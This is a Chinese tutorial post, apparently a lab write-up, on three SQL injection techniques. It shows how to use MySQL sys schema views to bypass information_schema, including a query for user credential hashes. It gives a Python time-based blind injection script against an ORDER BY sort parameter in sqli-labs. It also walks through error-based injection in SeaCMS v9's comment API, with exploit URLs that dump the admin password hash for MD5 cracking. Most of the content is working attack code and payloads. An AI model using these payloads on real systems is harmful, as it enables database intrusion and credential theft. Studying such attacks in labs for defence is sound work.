当前位置：首页 > news >正文

绕过information_schema与order by注入以及seacsmv9注入

news 来源：原创 2025/9/15 19:10:01

一:information_schema绕过

1,、sys数据库包含了许多视图，这些视图整合了来自information_schema和performance_schema的数据，攻击者可以利用这些视图来获取数据库结构信息。
-- 获取所有数据库名
SELECT DISTINCT table_schema FROM sys.schema_table_statistics;

-- 获取指定数据库中的所有表名
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema = 'your_database_name';

-- 获取指定表的所有列名
SELECT column_name
FROM sys.digest_columns
WHERE schema_name = 'your_database_name' AND table_name = 'your_table_name';
2、攻击者可以通过sys数据库中的一些视图来获取用户和权限相关的信息。
-- 获取用户和权限信息
SELECT user, host, authentication_string
FROM sys.user_summary
WHERE user != 'root';
3、攻击者可以将对sys数据库视图的查询与正常业务查询进行联合，以绕过一些简单的安全检测机制。
SELECT id, username FROM users
UNION
SELECT table_schema, table_name FROM sys.schema_table_statistics;
4、攻击者可以利用sys数据库视图的查询结果进行盲注攻击，逐步获取敏感信息。
-- 假设存在一个用户登录验证的漏洞
SELECT * FROM users WHERE username = 'admin' AND password = ''
AND (SELECT COUNT(*) FROM sys.schema_table_statistics WHERE table_schema = 'your_database_name') > 0;
5、sys 数据库中的某些视图可以提供关于索引的详细信息，攻击者可以利用这些视图绕过对 information_schema.statistics 的直接访问限制来获取索引信息。
-- 获取指定数据库中表的索引信息
SELECT index_name, table_name, column_name
FROM sys.schema_index_statistics
WHERE table_schema = 'your_database_name';
6、攻击者可以通过分析 sys 数据库中一些反映数据库活动和性能的视图，间接推测出数据库的数据字典信息，即使不能直接获取到完整的表结构和列信息，也能得到一些有价值的线索。
-- 通过查看表的读写统计信息推测表的重要性和大致结构
SELECT table_schema, table_name, rows_fetched, rows_inserted, rows_updated, rows_deleted
FROM sys.schema_table_statistics
WHERE table_schema = 'your_database_name';

二:order by的注入

import requests
import time

def inject_username(url):
username = ''
for i in range(1, 50): # 假设用户名最长为 50 个字符
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# 构造时间盲注 payload
payload = f"if((ascii(substr((SELECT username FROM users LIMIT 0,1),%d,1))>%d),sleep(1),1)" % (i, mid)
# 传参
params = {"sort": payload}
start_time = time.time()
# 异常处理
try:
r = requests.get(url, params=params, timeout=20)
except requests.Timeout:
print("Request timed out.")
continue
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
username += chr(mid)
print(f"最终获取到的用户名: {username}")

if __name__ == "__main__":
url = 'http://127.0.0.1/sqli-labs-php7/Less-46/index.php'
inject_username(url)

确定注入点：代码中通过 sort 参数进行注入，将构造的时间盲注 payload 传递给该参数。
时间盲注原理：利用 if 函数和 sleep 函数，根据数据库响应时间来判断条件是否成立，从而逐字符获取所需信息。

三:seacsmv9报错注入

seacmsv9漏洞文件：./comment/api/index.php

漏洞参数：$rlist

漏洞的源代码：

session_start();
require_once("../../include/common.php");
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
//缓存第一页的评论
if($page<2)
{
if(file_exists($jsoncachefile))
{
$json=LoadFile($jsoncachefile);
die($json);
}
}
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{
createTextFile($h,$jsoncachefile);
}
die($h);

function ReadData($id,$page)
{
global $type,$pCount,$rlist;
$ret = array("","",$page,0,10,$type,$id);
if($id>0)
{
$ret[0] = Readmlist($id,$page,$ret[4]);
$ret[3] = $pCount;
$x = implode(',',$rlist);
if(!empty($x))
{
$ret[1] = Readrlist($x,1,10000);
}
}
$readData = FormatJson($ret);
return $readData;
}

function Readmlist($id,$page,$size)
{
global $dsql,$type,$pCount,$rlist;
$ml=array();
if($id>0)
{
$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";
$rs = $dsql ->GetOne($sqlCount);
$pCount = ceil($rs['dd']/$size);
$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";
$dsql->setQuery($sql);
$dsql->Execute('commentmlist');
while($row=$dsql->GetArray('commentmlist'))
{
$row['reply'].=ReadReplyID($id,$row['reply'],$rlist);
$ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
}
}
$readmlist=join($ml,",");
return $readmlist;
}

function Readrlist($ids,$page,$size)
{
global $dsql,$type;
$rl=array();
$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";
$dsql->setQuery($sql);
$dsql->Execute('commentrlist');
while($row=$dsql->GetArray('commentrlist'))
{
$rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
}
$readrlist=join($rl,",");
return $readrlist;
}

注入风险:($id、$page 和 $type 这些变量被直接用于 SQL 查询语句中，并且代码仅对这些变量进行了简单的 is_numeric 检查，没有对输入进行严格的过滤和转义处理，这就可能导致 SQL 注入漏洞。)

$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";

$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page - 1) * $size.",$size ";

$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";

报错数据库名：

http://seacmsv9:8015/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`,extractvalue(1,concat_ws(0x7e,0x7e,database())),@`'`

报错表名:

http://seacmsv9:8015/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),%20@`%27`

因是表sea_comment为空，无返回值
在表sea_comment插入数据，再次注入查看

http://seacmsv9:8015//comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @`'`

进入MD5解密后得到

一:information_schema绕过

二:order by的注入

三:seacsmv9报错注入

相关文章：